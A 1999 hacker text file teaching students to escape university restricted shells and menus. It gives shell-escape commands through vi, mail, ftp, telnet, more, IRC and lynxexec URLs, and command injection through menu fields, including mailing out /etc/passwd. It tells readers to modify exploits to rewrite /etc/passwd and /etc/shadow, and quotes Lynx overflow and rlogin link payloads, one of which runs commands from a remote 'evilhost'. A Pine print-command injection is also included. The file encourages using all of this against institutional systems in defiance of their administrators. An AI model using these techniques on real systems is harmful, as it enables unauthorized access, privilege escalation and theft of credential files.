HOW TO STOP A MENU AND KILL THE STUPID LIMITATIONS V.2.3
    (Restricted shells, menus and that kind of s***)
                  by ET LoWNOISE 1999
                   et@cyberspace.org


DISCLAIMER
Learn.

INTRODUCTION

I change the title of this document because some people dont like
to read the kind of words that they use everyday. The real title 
of this document is: "How to stop a fucking menu and kill the stupid
limitations".

Often universities implement stupid restrictions in their servers 
And clients of student use that the only thing that they avoid is
the correct use of the resources available for you and for the others,
that pay a hi price to study in a quality college. 

But the common thing is that your university says that supports the 
Investigation, but this is simply a privilege of few and if you wish
To investigate or to learn on something, the amount of estupid people
That you have to fight against, thanks to the mistify technology policy,
And more letters, etc. it will show you that in fact they do not help,
they just collaborate with the increase of the technological mediocrity 
of this  hell and beautifull country of mine. 

This document is not a great inspiration for 31337 gurus, it is a simple
document so that any person with estupid limitations can jump them. 



MENU IN MY SHELL ACCOUNT (UNIX)?


You wish to learn UNIX (to realize that MICROSUCKS stinks out) and to
request an account shell in another server to learn, is something that
would not give you for multiple reasons, like not being from advanced 
semesters or things like that. 

The only thing that you have its a beautiful account with a beautiful
menu (implemented Menu that causes that any task takes 3 times the
normal run time and avoids the possibility of having direct access to
the system). 

The multiple ways to eliminate menu depend directly on the form as it
were implemented and the services that render. For that reason we will
begin using the simple way: 


1. Services 

To jump the menu first you will have to know what applications you have
normal access then some will have internal options that allow the 
execution of direct commands and/or in the best of cases take you to the
shell prompt. 

A simple menu in general have the following services which in fact are 
direct calls to the applications: 

       - E-mail (pine, mail)
       - File Transfer (FTP) 
       - Connect to other server (telnet)
       - Basic system commands (ex. finger, vi)
       - Configuration Setup
       - Some kind of chat (ex. IRC) 




1.1 Access to vi (Taken from alt.2600 FAQ)

Vi its a tipic and powerful text editor that maybe you have access to, 
when selecting the option to edit or to see the content of a file 
stored in your account. This is taken from the FAQ of alt.2600 and is
in fact the tipic and most known example that by obligation must be
included in this document. 

Execute Vi and type this command: 

:shell=/bin/sh 

Then leave to the shell using this command:

:shell

NOTE: 
If you restricted shell prevents the use of the command " CD ",
Execute FTP to your account and then you can take a walk by the
files using " CD ". 


1.2 Access to "mail" program

If you have access to "mail" program for the handling of E-mail
in your account follow the following steps: 

Execute the menu option that makes a call to the mail program.
In some menus or restricted shells you have the possibility 
to choose whatt application is used to handle your mail. 
Choose "mail" (no pine) and execute it. 

If you do not have any new mail to read, mail informe you that
it does not have mail to read  and bring back the menu.
 
Example.       
             1. Email (mail) <------- Select Option to E-Mail 

             No mail for user1..... 
             (It returned automatic to options menu)
    
        
   BEFORE THIS PLEASE SEND YOURSELF AN E-MAIL. 

   1. Email (mail) <------- Select Option to E-Mail 

   Mail version ?. Type ? for help.
   "/var/spool/mail/user1": 1 messages

   > 1 user1@my.host.edu Thu Sep 1 1:11 1/98  "test"
   & 

   Ok now we are at the mail prompt "&" so now just
   type this:

   &!/bin/sh[enter]
   $    <------------ Another dead menu :).

   Note: Many programs use the character "!" in order to
         talk about the command who allows the direct 
         execution of shell commands, in the best case 
         you must execute /bin/sh to leave to the shell
         (command interpreter).                 


1.3 FTP and Telnet

FTP and Telnet they also have the capacity of being able to 
execute commands from the prompt of each one with the same
character "!" like this: 


 ftp> !ps   <-------- !(command)
  PID TT STAT  TIME COMMAND
 2679 p2 S     0:01 -menu
 2832 p2 R     0:00 ps

telnet>!ps
 PID TT STAT  TIME COMMAND
 2679 p2 S     0:01 -menu
 2832 p2 R     0:00 ps

Sometimes depending on the initial configuration of your account,
the execution of commands using methods like this causes that 
sometimes the program is not located and therefore not executed.
Its recomended then that at the moment for executing any command
give the complete path (localization within the system). 


Example.

ftp> !/usr/bin/ps
PID TT STAT  TIME COMMAND
 2679 p2 S     0:01 -menu
 2832 p2 R     0:00 ps

NOTE: Always try to execute !/bin/sh

NOTE FOR WIN95/98 (winshit95/98) AND (winsucksNT) NT:
The same applies for these stinking " operating systems ":


           ftp>!command.com
           Microsoft<R> Windows NT DOS
           <C>Copyright Microsoft Corp 1990-1996.

           C:\>



With respect to  FTP its very easy to get the prompt because it always
appears after making or when ABORTING a connection. For telnet the
problem is that some menus when giving the telnet option, immediately
is going to request the host name or ip to connect itself without
having the opportunity to use the prompt at any  moment, but for
this try to make a connection and in the connection process  press
keys CONTROL+ ] to cancel all work leaving you at the telnet prompt. 


1.4 IRC 

If the menu o restricted shell has access to the IRC client (Internet
Relay Chat) when entering, you can execute any command with 
/EXEC (command). 


1.5 Lynx 

Lynx is the text client used in menus to get html pages (www). If the
execution of commands is enabled in Lynx (negligence in the installation 
and configuration) it can be used special URLs to execute arbitrary
commands in the system. Any command can be executed. 

The URLs used are lynxexec and lynxprog:

Example.
      lynxexec:ls -l       
      lynxprog:news
      lynxexec:/bin/sh

Example.
      lynx lynxexec://localhost/finger


1.6 MORE

Some restricted shells use a command line program called "more" 
to show a list, this program makes a pause when the screen is
full of data and wait for the user to press the space bar to 
continue, and it show at the bottom of the screen the percent 
showed at that moment.

If u think that u have access at any moment to this program 
(example: an option that show any anouncement about the system 
made by the administrator) type:

!/bin/sh  (this will execute the shell)
$

type ? to see more options.



--------------------------------------------------------------------------------

2. Implementation 

Depends on the way they implemented the menu (programming, language, 
the form as it is executed) makes difficult or facilitates the tricks 
to jump the imposed restrictions. Thats the reason why it is possible
that you need to modify a little the described forms so they can work. 


2.1. TRAPS

In fact im sure  that this case does not apply but is worth the trouble
to try (you neve know). " God works in mysterious ways ". 

In UNIX you have combinations of keys that when they are pressed they
send a signal to the program that is executing. Depending on the sent
signal the program will abort or suspend the execution. 

Multiple signals exist and if in the menu porgramming " traps " are
not handled that control the behavior of the program (menu), when
receiving a certain signal you could leave the menu without any
problem. 

At the time of initiating the menu press: 

  CONTROL + C    (Abort execution)
  CONTROL + Z    (Suspend execution)
      CONTROL + D

NOTE: Again it is not probable that this work, just a crazy programmer
will leave this kind of things behind. 


2.2 Configuration 

Some menus have configuration (Setup) options, which you can modify at 
any time to choose what editor you use, what type of terminal or the
mail program you prefer to work with. 

For negligence in the programming of the menu is possible that u can 
find fields that can be left in clean (empty)  entering one or several 
spaces, in the bottom  for example if we enter to text editor's 
configuration and we are requested to type the name of the program to 
use (Ex. pico, vi) when we return to the main menu and let us choose 
text editor's option the menu will make the call to the application 
that previously we have typed. If in the configuration we can leave 
the field in white as a group of typed spaces when we execute the menu
and we are requested the name of the file to publish (edit) there in 
that moment we will be able to give him any command to execute. 

If u prefers it also instead of leaving in spaces the field, just place
the command to execute,although this method is a little annoying if u will execute multiple commands.  

Example.

(Setup Option)
     Type The Text Editor to use (Pico , Vi)?:        _ <--- spaces
(Main Menu, "Edit" Option )
     Type the filename to edit:  ps    <------ Command

       PID TT STAT  TIME COMMAND
      2679 p2 S     0:01 -menu
      2832 p2 R     0:00 ps

This case depends on how was implemented the menu and how creative
you can be.


2.3 Beginning & Setup Files (.login ,.profile)

Commonly when you enter to your account, the shell automatically executes
Some commands included in a certain file (on tcsh it is .profile, on 
other shells is .login ).                 

Some administrators to execute the menu every time you logon to your account they include the line in this file. If the permits were not well placed to the file it is possible to edit  this file or to upload using FTP a .profile or .login according to the case, eliminating the lines that executethe menu. (Or simply erase the complete file).  
  
If you can see the content of the setup file of the shell and you realize that  
the menu is called directly without including its path, you can create a file  
with the same name, containing one line as /bin/sh and then  put in your  
account. If the PATH variable is not well defined and the execution of the menu                             isn't a direct  call in the file /etc/passwd, when you enter  to the account   
again the system will execute the mistaken menu (its kind of a Trojan Horse)
, leaving you directly in the shell defined. 

NOTE: be careful with the permisions of the new file.

2.4 linking Commands  
  
Another form of executing commands is to use characters that link 
commands in the shell this way:

user1> finger @some.host.edu;ps     <---------------- Check the ";"
[some.host.edu]

Welcome to Linux version 2.0.30 at some.host.edu !

  4:02pm  up 6 days,  2:51,  3 users,  load average: 0.05, 0.02, 0.00

Login     Name      Tty  Idle  Login Time   Office     Office Phone
user1                      p0     1  Sep 11 14:38 (xxx.25.64.xxx)
user2                      p1        Sep 11 16:01 (xxx.25.65.xxx)
user3                      p3     4  Sep 11 15:29 (xxx.25.68.xxx)

  PID TTY STAT  TIME COMMAND
 9562  p1 S    0:00 -tcsh
 9576  p1 R    0:00 ps

user1>     

Now you have noticed that in one line you can link multiple 
commands and execute them one behind another. Likewise if in the 
menu they have not taken the care of eliminate characters like 
this one ";"  , when  is requested some parameter for some 
internal command , you add more necessary commands :).  

Example.
      (Finger Menu Option)
                Type the Host: www.host.edu;ps
      (this will execute "finger @www.host.edu;ps" )

[www.host.edu]

Welcome to Linux version 2.0.30 at www.host.edu !

  4:02pm  up 6 days,  2:51,  3 users,  load average: 0.05, 0.02, 0.00

Login     Name      Tty  Idle  Login Time   Office     Office Phone
user1                      p0     1  Sep 11 14:38 (xxx.25.64.xxx)
user2                      p1        Sep 11 16:01 (xxx.25.65.xxx)
user3                      p3     4  Sep 11 15:29 (xxx.25.68.xxx)

  PID TTY STAT  TIME COMMAND
 9562  p1 S    0:00 -menu
 9576  p1 R    0:00 ps

Also work according to the application that in fact will be called
with rerouting characters and others ( >>,<<,>,<,&,!,;,:,|).

A little example to get the idea why to use this characters check this out:


  char *your_email_address
  char *execute_this_command

  strcpy(execute_this_command,"mail ");
  strcat(execute_this_command,your_email_address);
  system(execute_this_command);

What happen here?.. well , you found an option that send u some shit to 
a especific e-mail address. so u normally enter the e-mail address but
what happen if u enter a e-mail address like this one:

               hey@host.edu < /etc/passwd

because what it really does is:
         
                mail hey@host.edu < /etc/passwd

so its going to send u the /etc/passwd file to the e-mail address you choose.
NOW do u get the IDEA? (this kind of things are some of the things that 
you can do too with poor implemented CGI`s on WWW servers)     

2.5 Ok I can execute commands. So what can i do now?

Everything: (Buffers Overflows, etc etc).

Suddenly you don't find a way to leave directly to the shell but u can   
execute any command that u want. Modify an exploit that instead of executing  
in their code the /bin/sh ,executes a program that for example modifies the line in /etc/passwd and /etc/shadow so that executes directly a shell and not a menu when you log on.                             

Compile it in another host and upload it to your account. Now execute it as if it was a simple command, the rest leaves to your imagination.  
  
Many ways exist to be able to surpass those small limitations that  
they like to create. Everything depends on the creativity and the desires   
to learn that you have. The curiosity will never be a crime.  
  
  
  
3. COMMON PROGRAMS EXPLOITS 

Here are some recent exploits that can be useful according 
to the case:

3.1 Latest Lynx BUGS 
   ------------------

Michal Zalewski (lcamtuf@IDS.PL)
Sun, 6 Sep 1998 00:53:24 +0200 

Trivial Overflows on:

<a href="rlogin://(aprox. 1454 veces 'A')">...</a>,
<a href="telnet://(aprox. 1454 veces 'A')">...</a> o
<a href="tn3270://(aprox. 1454 veces 'A')">...</a>


Chooses your favorite protocol, beautiful SEGV in 0x41414141. Also,  
Overflows in finger://, cso://, nntp:// and news://. Unfortunately  
they are not so easily exploitable. 1454 bytes are  perfect for   
lynx 2.8.x under Linux. It can vary in other platforms.  
  
Nothing more to say. Me (Michal Zalewski (lcamtuf@IDS.PL))  reports similar overflows  
similar in the protocol mailto: months ago. I don't have idea if they have been fixed.  
  
Examples: http://dione.ids.pl/~lcamtuf/pliki/browsers.html.gz  
  
------------------------------------------------------------------
Artur Grabowski (art@STACKEN.KTH.SE)
Tue, 17 Nov 1998 17:06:00 +0100 

Lynx has a feature that allows trojans.

For users on systems where lynx is the login shell or somehow the only
program allowed to run, the user can obtain a shell by simply "clicking"
a link that looks like this: <a href="rlogin://foo;sh@foo">foo</a>.

Running hostile code is also easy with this feature:
<a href="rlogin://eviluser|sh@evilhost.foo">foo</a>. The login shell
(or something similiar) for eviluser@evilhost.foo prints out a few commands
to run on the victim.


3.2 PINE Bugs

(Chris Wilson <cmw32@HERMES.CAM.AC.UK>)

Vulnerability in Pine, proven in version 3.95q, but  
it probably applies to all the versions up to 4.02  
this vulnerability allows the execution of commands in   
restricted enviroments.  
  
When a printer is selected, it is possible to choose   
the option Personally selected print command."  
  
This allows to specify a command which pine will execute  
when a document will be printed.  
  
Changing the value of this selection. It is possible to 
execute any command when something is printed.  
For this reason administrators disable this with an option 
in the file pine.conf.fixed.  
  
But if you modify the file manually .pinerc, adding  
one line as:  

printer=test [] echo Hello! > test

Then this will jump the imposed restrictions and it will  execute  
the command each time  that it is said that it is print any document.  

-------------------------------------------------------------------

If u dont like this document dont worry, dont read it.

ET 1999. et@cyberspace.org          <--- this one is the real one
Colombia
            
et@my.narco-goverment.sucks.co